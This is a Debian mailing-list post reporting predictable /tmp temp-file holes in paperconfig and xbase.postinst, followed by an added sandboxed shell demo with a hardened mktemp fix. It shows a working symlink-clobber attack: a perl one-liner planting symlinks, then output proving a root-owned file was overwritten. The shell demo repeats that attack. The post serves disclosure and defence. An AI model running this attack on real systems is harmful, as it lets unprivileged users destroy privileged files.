Insecure admin scripts with /tmp temp files
There are several administrative programs that use temporary files in /tmp
without proper checking, resulting in major security holes. To make
problems worse, many packages have {post,pre}{inst,rm} scripts with the
same holes.
For example, /usr/sbin/paperconfig: a malicious user can destroy any file
by creating symbolic links in /tmp/.papersize.[$$..$$+100]. Now he only has
to wait for an unsuspecting superuser to run paperconfig, which does not
precheck the temp files it creates. Line 97:
if echo "$1" >/tmp/.papersize.$$
Another example of a postinst script security hole is in xbase.postinst,
caused by lines 131-132:
sed /^xbase-not-configured/d /etc/X11/config >/tmp/config.$$
mv /tmp/config.$$ /etc/X11/config
You can demonstrate the hole as follows:
As superuser, do
# echo 'do not mangle'> /precious
# chmod 600 /precious
Think of /precious as /dev/hd*, /etc/passwd, etc.
As normal user, do
perl -e 'foreach $i ($$..$$+200) {symlink("/precious", "/tmp/config.$i");}'
This creates a few symlinks in /tmp.
Now, as superuser, do
# dpkg -i xbase_3.3-3.deb
# cat /precious
no-xdm-start-server
no-start-xdm
# ls -l /etc/X11/config
lrwxrwxrwx 1 tom tom 9 Jul 31 12:00 /etc/X11/config -> /precious
Horrible!
To clean up, do
# rm /etc/X11/config
# mv /precious /etc/X11/config
# rm /tmp/config.*
Maybe there should be a set of rules for using temp files in security
critical applications (perhaps in Developers manual or Policy manual). Here
are a few suggestions:
1. Setuid programs and those programs run only with privileged uid
(daemons, admin) should not use publicly writable directories for temp
files, instead they should use a dedicated directory with uid only access.
For cases like paperconfig, where the temporary file will ultimately
replace a config file in /etc, /etc/*.conf.new might be a good choice.
There's a new problem though, deleting leftover files.
2. Temp files should be created with mode 600. Read access can also be
harmful.
3. A clueful superuser might want to use the TMPDIR environment variable,
pointing to a secure place for temp files. If temp files are created with
libc tempnam(), this is automatically used.
One could do clever tricks to check if the temp file does not exist, but I
think this is just asking for race condition, NFS etc. problems.
In C, you can use O_EXCL.
-Topi
--
Topi Miettinen, Project Manager, Telecom Finland
Hatanpaanvaltatie 18, FIN-33100 Tampere, Finland, Europe
Off-World Colonies - the chance to begin again in a golden land of opportunity and adventure
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-request@lists.debian.org .
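The attack described in the message, replayed next to a hardened replacement for the xbase.postinst lines, as an added example that is not part of the original post. Everything happens in a scratch directory created with mktemp -d; the paths and the fixed PID range 1000-1200 are stand-ins for /tmp, /etc/X11/config, /precious and the attacker's $$ guess. The hardened function uses mktemp(1), which performs the O_CREAT|O_EXCL open the message recommends for C, and creates the file in the target's own directory rather than in a world-writable one, so the final mv is an atomic rename on the same filesystem.

```shell
#!/bin/sh
# Added example, not code from the original message or from the xbase package.
# All paths are hypothetical stand-ins; nothing outside $SANDBOX is touched.

# Vulnerable pattern (the shape of xbase.postinst lines 131-132): predictable
# name in a world-writable directory, no existence check, and the redirect
# follows whatever symlink an attacker planted there.
vulnerable_rewrite() {
    conf=$1; tmpdir=$2; pid=$3
    sed /^xbase-not-configured/d "$conf" >"$tmpdir/config.$pid" || return 1
    mv "$tmpdir/config.$pid" "$conf"
}

# Hardened pattern: private umask, unpredictable name created O_EXCL by
# mktemp, placed beside the target so mv is an atomic rename. The result is
# left mode 0600 (rule 2 in the message); chmod afterwards if the config
# must be world-readable.
safe_rewrite() {
    conf=$1
    old_umask=$(umask); umask 077
    new=$(mktemp "$(dirname "$conf")/.$(basename "$conf").XXXXXX") || return 1
    umask "$old_umask"
    if sed /^xbase-not-configured/d "$conf" >"$new"; then
        mv -f "$new" "$conf"
    else
        rm -f "$new"; return 1
    fi
}

# Runs the attack against both versions and prints "<attack_ok> <defended>".
run_demo() {
    SANDBOX=$(mktemp -d) || return 1
    etc="$SANDBOX/etc"; tmp="$SANDBOX/tmp"
    mkdir "$etc" "$tmp"
    # Constructed sample config and the "precious" file the attacker targets.
    printf 'xbase-not-configured\nno-start-xdm\n' >"$etc/config"
    printf 'do not mangle\n' >"$SANDBOX/precious"
    chmod 600 "$SANDBOX/precious"

    # Attacker (as an unprivileged user) plants symlinks over the PID range
    # the victim's script might use, like the perl one-liner in the message.
    i=1000
    while [ $i -le 1200 ]; do
        ln -s "$SANDBOX/precious" "$tmp/config.$i"
        i=$((i+1))
    done

    # Superuser runs the vulnerable script with a PID inside that range:
    # precious is overwritten and the config becomes a symlink to it.
    vulnerable_rewrite "$etc/config" "$tmp" 1100
    attack_ok=0
    if [ -L "$etc/config" ] && [ "$(cat "$SANDBOX/precious")" = "no-start-xdm" ]; then
        attack_ok=1
    fi

    # Reset the config and run the hardened version with the same symlinks
    # still planted in the scratch /tmp.
    rm -f "$etc/config"
    printf 'xbase-not-configured\nno-start-xdm\n' >"$etc/config"
    safe_rewrite "$etc/config"
    defended=0
    if [ ! -L "$etc/config" ] && [ -f "$etc/config" ] \
       && [ "$(cat "$etc/config")" = "no-start-xdm" ] \
       && [ "$(ls -ld "$etc/config" | cut -c1-10)" = "-rw-------" ]; then
        defended=1
    fi
    rm -rf "$SANDBOX"
    echo "$attack_ok $defended"
}

run_demo   # prints: 1 1
```

The check on the hardened side is deliberately strict: the config must be a regular file (not a symlink), carry the sed output, and be mode 0600. If your postinst needs the temp file elsewhere, honour TMPDIR as the message suggests, but never fall back to a bare /tmp/name.$$.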